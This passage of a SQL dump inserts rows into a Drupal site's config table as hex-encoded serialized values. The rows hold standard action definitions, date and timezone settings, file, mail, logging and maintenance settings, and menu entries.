('', 'system.action.comment_unpublish_action', 0x613a31303a7b733a343a2275756964223b733a33363a2236643537306365382d393163642d343938322d613635382d656330373935666566393865223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a373a22636f6d6d656e74223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2274574f496a534d6f6245574f465a64644d6b4e7162394a7953624f56774531646943364e527163664c546b223b7d733a323a226964223b733a32343a22636f6d6d656e745f756e7075626c6973685f616374696f6e223b733a353a226c6162656c223b733a31373a22556e7075626c69736820636f6d6d656e74223b733a343a2274797065223b733a373a22636f6d6d656e74223b733a363a22706c7567696e223b733a33313a22656e746974793a756e7075626c6973685f616374696f6e3a636f6d6d656e74223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.media_delete_action', 0x613a31303a7b733a343a2275756964223b733a33363a2236626530653763652d383339312d343664332d383031332d653231366637326233363533223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a353a226d65646961223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2246725a7931746d75584a634f7868586c426f493148736e656e3554542d394f434331696f6c57483834676f223b7d733a323a226964223b733a31393a226d656469615f64656c6574655f616374696f6e223b733a353a226c6162656c223b733a31323a2244656c657465206d65646961223b733a343a2274797065223b733a353a226d65646961223b733a363a22706c7567696e223b733a32363a22656e746974793a64656c6574655f616374696f6e3a6d65646961223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.media_publish_action', 0x613a31303a7b733a343a2275756964223b733a33363a2230653464346366382d613961312d343931352d396162632d326166393863336334383564223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a353a226d65646961223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226e683833714e4e726d57452d434464487a324d64464f416b363054396d7a7633522d4d614b665a52326a77223b7d733a323a226964223b733a32303a226d656469615f7075626c6973685f616374696f6e223b733a353a226c6162656c223b733a31333a225075626c697368206d65646961223b733a343a2274797065223b733a353a226d65646961223b733a363a22706c7567696e223b733a32373a22656e746974793a7075626c6973685f616374696f6e3a6d65646961223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.media_save_action', 0x613a31303a7b733a343a2275756964223b733a33363a2261363164663761642d656335312d346233652d393335632d333364396630323263386365223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a353a226d65646961223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2256567955413650496156654774634962674557714a36535944694a64526542656f6a467377555246704b73223b7d733a323a226964223b733a31373a226d656469615f736176655f616374696f6e223b733a353a226c6162656c223b733a31303a2253617665206d65646961223b733a343a2274797065223b733a353a226d65646961223b733a363a22706c7567696e223b733a32343a22656e746974793a736176655f616374696f6e3a6d65646961223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.media_unpublish_action', 0x613a31303a7b733a343a2275756964223b733a33363a2266376161346230662d323036662d343763302d613632342d666538393932623730643936223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a353a226d65646961223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2243734b36547365513244617445625a676264333073774f6c5a32385f48487741455355324c76456e577130223b7d733a323a226964223b733a32323a226d656469615f756e7075626c6973685f616374696f6e223b733a353a226c6162656c223b733a31353a22556e7075626c697368206d65646961223b733a343a2274797065223b733a353a226d65646961223b733a363a22706c7567696e223b733a32393a22656e746974793a756e7075626c6973685f616374696f6e3a6d65646961223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.node_delete_action', 0x613a31303a7b733a343a2275756964223b733a33363a2234333637646265372d303764342d346362622d396537612d663835346265633961663764223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a226e6f6465223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a227434334f71777a5033435462634161675373574b4e79364b774d6d5f7a5368586f3363342d536f36725167223b7d733a323a226964223b733a31383a226e6f64655f64656c6574655f616374696f6e223b733a353a226c6162656c223b733a31343a2244656c65746520636f6e74656e74223b733a343a2274797065223b733a343a226e6f6465223b733a363a22706c7567696e223b733a32353a22656e746974793a64656c6574655f616374696f6e3a6e6f6465223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.node_make_sticky_action', 0x613a31303a7b733a343a2275756964223b733a33363a2234346633316361392d353539622d343638662d623835662d356430363265663436363161223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a226e6f6465223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22734f6232364a537933664770576b76523057594e365f684d716a5f36643172766276726b7a703179796130223b7d733a323a226964223b733a32333a226e6f64655f6d616b655f737469636b795f616374696f6e223b733a353a226c6162656c223b733a31393a224d616b6520636f6e74656e7420737469636b79223b733a343a2274797065223b733a343a226e6f6465223b733a363a22706c7567696e223b733a32333a226e6f64655f6d616b655f737469636b795f616374696f6e223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.node_make_unsticky_action', 0x613a31303a7b733a343a2275756964223b733a33363a2231346531643639302d666139352d343034392d616435392d396335323032666166303535223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a226e6f6465223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226c444d396d76494741753853773872742d75434f34537237795835565072445078596361776b624b64366b223b7d733a323a226964223b733a32353a226e6f64655f6d616b655f756e737469636b795f616374696f6e223b733a353a226c6162656c223b733a32313a224d616b6520636f6e74656e7420756e737469636b79223b733a343a2274797065223b733a343a226e6f6465223b733a363a22706c7567696e223b733a32353a226e6f64655f6d616b655f756e737469636b795f616374696f6e223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.node_promote_action', 0x613a31303a7b733a343a2275756964223b733a33363a2239376232653063372d363137652d343563362d616165392d346534313433383537323665223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a226e6f6465223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224e305244425471694b34644b6f4e3470346f57326a305347577963644879414c5565394d2d4f6670383955223b7d733a323a226964223b733a31393a226e6f64655f70726f6d6f74655f616374696f6e223b733a353a226c6162656c223b733a32393a2250726f6d6f746520636f6e74656e7420746f2066726f6e742070616765223b733a343a2274797065223b733a343a226e6f6465223b733a363a22706c7567696e223b733a31393a226e6f64655f70726f6d6f74655f616374696f6e223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.node_publish_action', 0x613a31303a7b733a343a2275756964223b733a33363a2238356462356663662d363338662d343636652d613563632d306532623465383231346132223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a226e6f6465223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a223242397546384e4c356775744e4b5364505241686841734457465a5a4731504a4f426d7830614247645f30223b7d733a323a226964223b733a31393a226e6f64655f7075626c6973685f616374696f6e223b733a353a226c6162656c223b733a31353a225075626c69736820636f6e74656e74223b733a343a2274797065223b733a343a226e6f6465223b733a363a22706c7567696e223b733a32363a22656e746974793a7075626c6973685f616374696f6e3a6e6f6465223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.node_save_action', 0x613a31303a7b733a343a2275756964223b733a33363a2235336331653035622d346662622d343635302d616137612d346435613966313461653166223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a226e6f6465223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224c6864736f5a504c5f7046617332666a6141577565347a7672515f7445566f664c5974634e65632d4a474d223b7d733a323a226964223b733a31363a226e6f64655f736176655f616374696f6e223b733a353a226c6162656c223b733a31323a225361766520636f6e74656e74223b733a343a2274797065223b733a343a226e6f6465223b733a363a22706c7567696e223b733a32333a22656e746974793a736176655f616374696f6e3a6e6f6465223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.node_unpromote_action', 0x613a31303a7b733a343a2275756964223b733a33363a2233626138323539652d386234362d346461382d623463302d616430626633363335393330223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a226e6f6465223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224a4270746a6e66754f4d7473644b79676b6c58786f4f67654f43544d7451786c6b796d6a6e6e6a2d634330223b7d733a323a226964223b733a32313a226e6f64655f756e70726f6d6f74655f616374696f6e223b733a353a226c6162656c223b733a33303a2252656d6f766520636f6e74656e742066726f6d2066726f6e742070616765223b733a343a2274797065223b733a343a226e6f6465223b733a363a22706c7567696e223b733a32313a226e6f64655f756e70726f6d6f74655f616374696f6e223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.node_unpublish_action', 0x613a31303a7b733a343a2275756964223b733a33363a2262326634653533322d626138302d343830652d616335382d306566343364633930386238223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a226e6f6465223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2243375838683946576c776b513979356d6e55324a7a67615a49434164633648466250566268766a6c415945223b7d733a323a226964223b733a32313a226e6f64655f756e7075626c6973685f616374696f6e223b733a353a226c6162656c223b733a31373a22556e7075626c69736820636f6e74656e74223b733a343a2274797065223b733a343a226e6f6465223b733a363a22706c7567696e223b733a32383a22656e746974793a756e7075626c6973685f616374696f6e3a6e6f6465223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.pathauto_update_alias_node', 0x613a31303a7b733a343a2275756964223b733a33363a2234393735386438312d333933372d343039342d386631652d623131353161613430616366223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a383a22706174686175746f223b7d733a383a22656e666f72636564223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a226e6f6465223b7d7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226c6e6f385154685333343855582d6b61557361674a74436e7550484b4c58596e545169465f394853445741223b7d733a323a226964223b733a32363a22706174686175746f5f7570646174655f616c6961735f6e6f6465223b733a353a226c6162656c223b733a31363a225570646174652055524c20616c696173223b733a343a2274797065223b733a343a226e6f6465223b733a363a22706c7567696e223b733a32313a22706174686175746f5f7570646174655f616c696173223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.pathauto_update_alias_user', 0x613a31303a7b733a343a2275756964223b733a33363a2266636430363664642d346135332d343635362d626337372d336436636437316634643831223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a383a22706174686175746f223b7d733a383a22656e666f72636564223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a2275736572223b7d7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22785f6f6b5f5a73664134586b34425f685657334f342d3350634e6f4b35376e584c7a5f446c6c6574696467223b7d733a323a226964223b733a32363a22706174686175746f5f7570646174655f616c6961735f75736572223b733a353a226c6162656c223b733a31363a225570646174652055524c20616c696173223b733a343a2274797065223b733a343a2275736572223b733a363a22706c7567696e223b733a32313a22706174686175746f5f7570646174655f616c696173223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.taxonomy_term_publish_action', 0x613a31303a7b733a343a2275756964223b733a33363a2264646131636234342d343366352d346533642d623265332d366634376634396434396562223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a383a227461786f6e6f6d79223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22446f56745f564767564c63444434586d566253467a72304b3137534a7939696d46695975734b6b4a426759223b7d733a323a226964223b733a32383a227461786f6e6f6d795f7465726d5f7075626c6973685f616374696f6e223b733a353a226c6162656c223b733a32313a225075626c697368207461786f6e6f6d79207465726d223b733a343a2274797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a22706c7567696e223b733a33353a22656e746974793a7075626c6973685f616374696f6e3a7461786f6e6f6d795f7465726d223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.taxonomy_term_unpublish_action', 0x613a31303a7b733a343a2275756964223b733a33363a2237663538666663362d623266342d343831332d616165662d376336343736653936303863223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a383a227461786f6e6f6d79223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a227a32734e524d3345436137465043476e534e6a655f39536d5a4a51677768445f3666475f4c344d72387a49223b7d733a323a226964223b733a33303a227461786f6e6f6d795f7465726d5f756e7075626c6973685f616374696f6e223b733a353a226c6162656c223b733a32333a22556e7075626c697368207461786f6e6f6d79207465726d223b733a343a2274797065223b733a31333a227461786f6e6f6d795f7465726d223b733a363a22706c7567696e223b733a33373a22656e746974793a756e7075626c6973685f616374696f6e3a7461786f6e6f6d795f7465726d223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.user_add_role_action.administrator', 0x613a393a7b733a343a2275756964223b733a33363a2236626463376163372d333337632d343134662d383134322d346462336132656662303562223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32333a22757365722e726f6c652e61646d696e6973747261746f72223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2275736572223b7d7d733a323a226964223b733a33343a22757365725f6164645f726f6c655f616374696f6e2e61646d696e6973747261746f72223b733a353a226c6162656c223b733a35303a22416464207468652041646d696e6973747261746f7220726f6c6520746f207468652073656c65637465642075736572287329223b733a343a2274797065223b733a343a2275736572223b733a363a22706c7567696e223b733a32303a22757365725f6164645f726f6c655f616374696f6e223b733a31333a22636f6e66696775726174696f6e223b613a313a7b733a333a22726964223b733a31333a2261646d696e6973747261746f72223b7d7d),
('', 'system.action.user_add_role_action.content_editor', 0x613a393a7b733a343a2275756964223b733a33363a2263633666353266622d363333632d343132612d383736652d376233656334656262323833223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32343a22757365722e726f6c652e636f6e74656e745f656469746f72223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2275736572223b7d7d733a323a226964223b733a33353a22757365725f6164645f726f6c655f616374696f6e2e636f6e74656e745f656469746f72223b733a353a226c6162656c223b733a35313a224164642074686520436f6e74656e7420656469746f7220726f6c6520746f207468652073656c65637465642075736572287329223b733a343a2274797065223b733a343a2275736572223b733a363a22706c7567696e223b733a32303a22757365725f6164645f726f6c655f616374696f6e223b733a31333a22636f6e66696775726174696f6e223b613a313a7b733a333a22726964223b733a31343a22636f6e74656e745f656469746f72223b7d7d),
('', 'system.action.user_block_user_action', 0x613a31303a7b733a343a2275756964223b733a33363a2234383361343864642d653665662d343261332d616533302d356161353332303865613835223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a2275736572223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22447979707a54665468583130464651772d33393971506645624c4c797268586751724b5056736d416f4a34223b7d733a323a226964223b733a32323a22757365725f626c6f636b5f757365725f616374696f6e223b733a353a226c6162656c223b733a32363a22426c6f636b207468652073656c65637465642075736572287329223b733a343a2274797065223b733a343a2275736572223b733a363a22706c7567696e223b733a32323a22757365725f626c6f636b5f757365725f616374696f6e223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.user_cancel_user_action', 0x613a31303a7b733a343a2275756964223b733a33363a2265653435663565302d326536392d343838382d613161322d373434376266343664343235223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a2275736572223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226e76724c396246696c7a42766d32626a4f3972516e464470424137644242556a5368535374364e532d4455223b7d733a323a226964223b733a32333a22757365725f63616e63656c5f757365725f616374696f6e223b733a353a226c6162656c223b733a33353a2243616e63656c207468652073656c65637465642075736572206163636f756e74287329223b733a343a2274797065223b733a343a2275736572223b733a363a22706c7567696e223b733a32333a22757365725f63616e63656c5f757365725f616374696f6e223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.user_remove_role_action.administrator', 0x613a393a7b733a343a2275756964223b733a33363a2235366230666661612d333265342d343962622d393265382d383036306665393731386139223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32333a22757365722e726f6c652e61646d696e6973747261746f72223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2275736572223b7d7d733a323a226964223b733a33373a22757365725f72656d6f76655f726f6c655f616374696f6e2e61646d696e6973747261746f72223b733a353a226c6162656c223b733a35353a2252656d6f7665207468652041646d696e6973747261746f7220726f6c652066726f6d207468652073656c65637465642075736572287329223b733a343a2274797065223b733a343a2275736572223b733a363a22706c7567696e223b733a32333a22757365725f72656d6f76655f726f6c655f616374696f6e223b733a31333a22636f6e66696775726174696f6e223b613a313a7b733a333a22726964223b733a31333a2261646d696e6973747261746f72223b7d7d),
('', 'system.action.user_remove_role_action.content_editor', 0x613a393a7b733a343a2275756964223b733a33363a2263613039636663372d343130352d343065652d386139632d613032633938613836616233223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32343a22757365722e726f6c652e636f6e74656e745f656469746f72223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2275736572223b7d7d733a323a226964223b733a33383a22757365725f72656d6f76655f726f6c655f616374696f6e2e636f6e74656e745f656469746f72223b733a353a226c6162656c223b733a35363a2252656d6f76652074686520436f6e74656e7420656469746f7220726f6c652066726f6d207468652073656c65637465642075736572287329223b733a343a2274797065223b733a343a2275736572223b733a363a22706c7567696e223b733a32333a22757365725f72656d6f76655f726f6c655f616374696f6e223b733a31333a22636f6e66696775726174696f6e223b613a313a7b733a333a22726964223b733a31343a22636f6e74656e745f656469746f72223b7d7d),
('', 'system.action.user_unblock_user_action', 0x613a31303a7b733a343a2275756964223b733a33363a2235343439376234362d613963622d346438652d623362612d616530343832353737653162223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a2275736572223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a225350735558735233526338643179336765777a61414b5761316e6365615f797758583366374c546e376b30223b7d733a323a226964223b733a32343a22757365725f756e626c6f636b5f757365725f616374696f6e223b733a353a226c6162656c223b733a32383a22556e626c6f636b207468652073656c65637465642075736572287329223b733a343a2274797065223b733a343a2275736572223b733a363a22706c7567696e223b733a32343a22757365725f756e626c6f636b5f757365725f616374696f6e223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.advisories', 0x613a333a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2278304675515f37436738316d53445177473032385f5a30436a4833523969623549446c486556324262416f223b7d733a373a22656e61626c6564223b623a313b733a31343a22696e74657276616c5f686f757273223b693a363b7d),
('', 'system.cron', 0x613a333a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a223550773932317931455066464e393877796b6c6942424c41726d353170432d536d72586559436537643059223b7d733a393a227468726573686f6c64223b613a323a7b733a32303a22726571756972656d656e74735f7761726e696e67223b693a3137323830303b733a31383a22726571756972656d656e74735f6572726f72223b693a313230393630303b7d733a373a226c6f6767696e67223b623a313b7d),
('', 'system.date', 0x613a343a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a227437636c6a336d7a6d4f477258583048754348357573663076457152746e4d544246564249456d5a357063223b7d733a393a2266697273745f646179223b693a303b733a373a22636f756e747279223b613a313a7b733a373a2264656661756c74223b733a323a224d4d223b7d733a383a2274696d657a6f6e65223b613a323a7b733a373a2264656661756c74223b733a31313a22417369612f59616e676f6e223b733a343a2275736572223b613a333a7b733a31323a22636f6e666967757261626c65223b623a313b733a373a2264656661756c74223b693a303b733a343a227761726e223b623a303b7d7d7d),
('', 'system.diff', 0x613a323a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a223157616e6d61456878575f764d385f354b7473646e746a384d614f395542485867306c4e3630335073574d223b7d733a373a22636f6e74657874223b613a323a7b733a31333a226c696e65735f6c656164696e67223b693a323b733a31343a226c696e65735f747261696c696e67223b693a323b7d7d),
('', 'system.feature_flags', 0x613a313a7b733a31363a226c696e6b7365745f656e64706f696e74223b623a303b7d),
('', 'system.file', 0x613a343a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226d6775474843596239447735456370666a776f5368475631566a6b627a3351755052434c66786979652d67223b7d733a32323a22616c6c6f775f696e7365637572655f75706c6f616473223b623a303b733a31343a2264656661756c745f736368656d65223b733a363a227075626c6963223b733a32313a2274656d706f726172795f6d6178696d756d5f616765223b693a32313630303b7d),
('', 'system.image', 0x613a323a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226475725748614b654261713464395770693452717741446a314f7566446570636e4a7568564c6d4b4e3234223b7d733a373a22746f6f6c6b6974223b733a323a226764223b7d),
('', 'system.image.gd', 0x613a323a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22654e586148666b4a4a555468486546306e766b6f5879504c52724b5947786748526a4f5276543446357251223b7d733a31323a226a7065675f7175616c697479223b693a37353b7d),
('', 'system.logging', 0x613a323a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2275332d6e6a737a6c39324661786a72434d6971307944636a4166636478373277317a54314f396478366141223b7d733a31313a226572726f725f6c6576656c223b733a343a2268696465223b7d),
('', 'system.mail', 0x613a333a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a227259677437756850616650326e67614e5f5a555046757949344b6445307a553836387a4c4e536c7a4b6f45223b7d733a393a22696e74657266616365223b613a313a7b733a373a2264656661756c74223b733a383a227068705f6d61696c223b7d733a31303a226d61696c65725f64736e223b613a363a7b733a363a22736368656d65223b733a383a2273656e646d61696c223b733a343a22686f7374223b733a373a2264656661756c74223b733a343a2275736572223b4e3b733a383a2270617373776f7264223b4e3b733a343a22706f7274223b4e3b733a373a226f7074696f6e73223b613a303a7b7d7d7d),
('', 'system.maintenance', 0x613a333a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2231534e64413235494e735635596a6c67414a7466432d36414d38566357655f3030786e654d4c6232794667223b7d733a383a226c616e67636f6465223b733a323a226a61223b733a373a226d657373616765223b733a39333a2240736974652069732063757272656e746c7920756e646572206d61696e74656e616e63652e2057652073686f756c64206265206261636b2073686f72746c792e205468616e6b20796f7520666f7220796f75722070617469656e63652e223b7d),
('', 'system.menu.account', 0x613a393a7b733a343a2275756964223b733a33363a2262383564626561632d623535652d346461352d613363372d373231636436663130306136223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224d5f426838316f7344795551347756304767555f4e64424e716b7a4d3837734c786a614364466a396d6e77223b7d733a323a226964223b733a373a226163636f756e74223b733a353a226c6162656c223b733a31373a2255736572206163636f756e74206d656e75223b733a31313a226465736372697074696f6e223b733a34303a224c696e6b732072656c6174656420746f20746865206163746976652075736572206163636f756e74223b733a363a226c6f636b6564223b623a313b7d),
('', 'system.menu.admin', 0x613a393a7b733a343a2275756964223b733a33363a2236306438363164652d393035362d346131322d613533362d643131323564333338363434223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a227361704569325944476f4939795149545f5767495632765564513644536348305633664179546164414c30223b7d733a323a226964223b733a353a2261646d696e223b733a353a226c6162656c223b733a31343a2241646d696e697374726174696f6e223b733a31313a226465736372697074696f6e223b733a32353a2241646d696e697374726174697665207461736b206c696e6b73223b733a363a226c6f636b6564223b623a313b7d),
('', 'system.menu.footer', 0x613a393a7b733a343a2275756964223b733a33363a2265363261613534312d303135392d343538612d613434312d666438643365656434356131223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a223779726c57357a397a646732654275634232475071584b534d516648396c5352534f344462574637414663223b7d733a323a226964223b733a363a22666f6f746572223b733a353a226c6162656c223b733a363a22466f6f746572223b733a31313a226465736372697074696f6e223b733a32323a225369746520696e666f726d6174696f6e206c696e6b73223b733a363a226c6f636b6564223b623a313b7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'system.menu.main', 0x613a393a7b733a343a2275756964223b733a33363a2266663462396538352d386363622d343934312d613461652d313339323164363034666231223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2251325261336a666f49566b306633536a784a583631627952514656424162707a5944514f69592d6b6e6f38223b7d733a323a226964223b733a343a226d61696e223b733a353a226c6162656c223b733a31353a224d61696e206e617669676174696f6e223b733a31313a226465736372697074696f6e223b733a31383a22536974652073656374696f6e206c696e6b73223b733a363a226c6f636b6564223b623a313b7d),
('', 'system.menu.main-menu', 0x613a383a7b733a343a2275756964223b733a33363a2232653433653332652d633035632d343934332d623439652d626461343162323536663361223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a323a226964223b733a393a226d61696e2d6d656e75223b733a353a226c6162656c223b733a393a224d61696e204d656e75223b733a31313a226465736372697074696f6e223b733a303a22223b733a363a226c6f636b6564223b623a303b7d),
